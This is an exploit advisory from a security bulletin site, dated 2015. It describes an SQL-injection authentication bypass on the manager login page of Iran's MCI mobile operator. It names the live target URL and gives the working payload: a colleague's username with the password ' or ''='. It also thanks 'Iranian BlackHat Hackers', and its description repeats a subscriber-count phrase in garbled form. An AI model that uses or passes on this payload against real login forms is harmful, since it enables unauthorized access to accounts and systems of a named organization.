MCI Manager Login Authentication bypass vulnerability

Published
Credit
Risk
2015.11.06
4TT4CK3R
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

Description : Mobile Telecommunication Company of Iran (MCI) - Public Company also know under it brand name
Hamrah-e-Aval is Iran's first and largest mobile phone network operator. MCI is a subsidiary of the Telecommunication
Company of Iran and it has over 18 milion postpaid and over 20 milion postpaid and over 20 milion prepaid subscribers.


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit title : MCI Manager Login Authentication bypass vulnerability
~# : Exploit Author : 4TT4CK3R
~# : Vendor Homepage : https://mciX.ir
~# : Date : 2015/09/03
~# : Tested on : Kali linux , Windows , Mozilla Firefox
~# : Google Dork : No
~# : Location : https://mci.ir/web/guest/login
~# : Instead password use of ' or ''='


~# : Username : Colleague Username
~# : Password : ' or ''='

~# : ScreenShot : http://i.imgur.com/ffRZCLE.png

~# : Discovered by : 4TT4CK3R

~# : Special thanks to : Iranian BlackHat Hackers

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://i.imgur.com/ffRZCLE.png


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com